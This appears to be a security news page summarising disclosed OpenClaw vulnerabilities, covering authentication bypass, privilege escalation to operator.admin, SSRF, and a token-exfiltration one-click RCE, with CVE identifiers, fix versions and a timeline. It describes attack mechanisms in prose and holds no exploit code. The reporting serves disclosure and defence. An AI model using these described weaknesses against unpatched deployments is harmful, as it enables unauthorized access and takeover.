OpenClaw Flaws Allowed Authentication Bypass and Admin Privilege Escalation
OpenClaw disclosed two high-severity vulnerabilities affecting versions before 2026.2.21 and 2026.3.25, exposing gateway routes to unauthorized access and privilege escalation. CVE-2026-32045 is an authentication bypass in HTTP gateway routes caused by incorrect application of tokenless Tailscale header authentication, allowing attackers on trusted networks to reach protected routes without valid tokens or passwords. The issue is tracked as CWE-290 and carries a CVSS v3.1 vector of AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N, indicating a confidentiality-focused impact.
Timeline
Apr 10, 2026
CVE-2026-35663 publicly disclosed
A high-severity OpenClaw vulnerability, CVE-2026-35663, was publicly disclosed affecting versions before 2026.3.25. The privilege escalation flaw in the backend reconnect process allowed non-admin operators to self-request broader scopes, bypass pairing requirements, and reconnect as operator.admin.
Apr 10, 2026
CVE-2026-35669 publicly disclosed
CVE-2026-35669 was publicly disclosed on April 10, 2026 as a high-severity OpenClaw privilege escalation vulnerability. It was classified as CWE-648 and described as allowing a low-privileged attacker to obtain operator.admin runtime scope and perform unauthorized actions.
Apr 10, 2026
VulnCheck receives disclosure for CVE-2026-35669
The privilege escalation vulnerability later assigned CVE-2026-35669 was received by disclosure@vulncheck.com on April 10, 2026. The flaw involved improper authentication scope handling in OpenClaw plugin HTTP routes.
Mar 25, 2026
OpenClaw fixes privilege escalation in version 2026.3.25
OpenClaw addressed CVE-2026-35669 in version 2026.3.25, fixing a privilege escalation flaw in gateway-authenticated plugin HTTP routes that incorrectly minted the operator.admin runtime scope. The bug affected versions before 2026.3.25 and could let low-privileged users gain elevated administrative capabilities.
Mar 21, 2026
CVE-2026-32045 publicly disclosed
A high-severity vulnerability, CVE-2026-32045, was disclosed for OpenClaw on March 21, 2026. The issue was classified as CWE-290 and described as enabling unauthorized access to HTTP gateway routes without valid authentication credentials.
Feb 21, 2026
OpenClaw fixes authentication bypass in version 2026.2.21
OpenClaw addressed CVE-2026-32045 in version 2026.2.21, fixing an authentication bypass in HTTP gateway routes caused by incorrect application of tokenless Tailscale header authentication. The flaw affected versions prior to 2026.2.21 and could allow attackers on trusted networks to access routes without valid tokens or passwords.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Vulnerabilities
Organizations
Affected Products
Sources
Related Stories
OpenClaw Flaws Let Authenticated Users Escalate Privileges and Bypass Authorization
Two high-severity vulnerabilities in OpenClaw exposed paths for authenticated users to gain access beyond their intended roles. **CVE-2026-32042** affects versions before `2026.2.25` and allows an attacker with valid shared gateway authentication to present a self-signed, unpaired device identity and bypass pairing requirements, then self-assign elevated operator scopes including `operator.admin`. The issue is classified as `CWE-863` and effectively turns a trusted but unapproved device identity into a route for privilege escalation. A second flaw, **CVE-2026-32051**, affects OpenClaw versions before `2026.3.1` and allows users with `operator.write` scope to reach owner-only tool surfaces such as gateway and cron through agent runs in scoped-token deployments. The authorization mismatch lets lower-privileged authenticated users perform control-plane actions that should be restricted to owners, creating high risk to confidentiality, integrity, and availability. Advisories for both issues point to fixes and security guidance through GitHub and VulnCheck.
1 weeks ago
OpenClaw SSRF Flaws Expose Internal Services Through Citation Redirects and Image Fetches
OpenClaw disclosed two high-severity server-side request forgery vulnerabilities affecting versions prior to `2026.3.1` and `2026.3.28`. **CVE-2026-32902** impacts `web_search` citation redirect resolution, where attacker-influenced redirect targets can cause the OpenClaw gateway host to send requests to private-network destinations. The issue is tracked as `CWE-918` and was assigned a CVSS v3.1 vector of `AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L`, indicating remote exploitation without privileges or user interaction.
1 months ago
OpenClaw Vulnerability Enables Token Exfiltration and One-Click RCE via Malicious Link
A high-severity flaw in **OpenClaw** (also known as *Clawdbot* / *Moltbot*) enables **one-click remote code execution (RCE)** by abusing how the Control UI auto-connects to a gateway specified via a crafted URL. The issue is tracked as **CVE-2026-25253** (CVSS **8.8**) and was fixed in **OpenClaw 2026.1.29**; the core weakness is that the UI trusts `gatewayUrl` from the query string and sends a stored gateway token in the WebSocket connection payload, allowing **token exfiltration** to an attacker-controlled server. With the stolen token, an attacker can connect to the victim’s local gateway and perform privileged actions—such as modifying configuration (e.g., sandbox/tool policies) and invoking privileged operations—resulting in **full gateway compromise** and RCE. Separate reporting also highlights architectural risk in OpenClaw’s local WebSocket-based Chrome orchestration, noting that (prior to patching) unauthenticated connections could be initiated from JavaScript running in a user’s browser, enabling cross-tab/session credential theft; users are advised to **patch immediately** and be cautious about deployment given ongoing security concerns.
1 months ago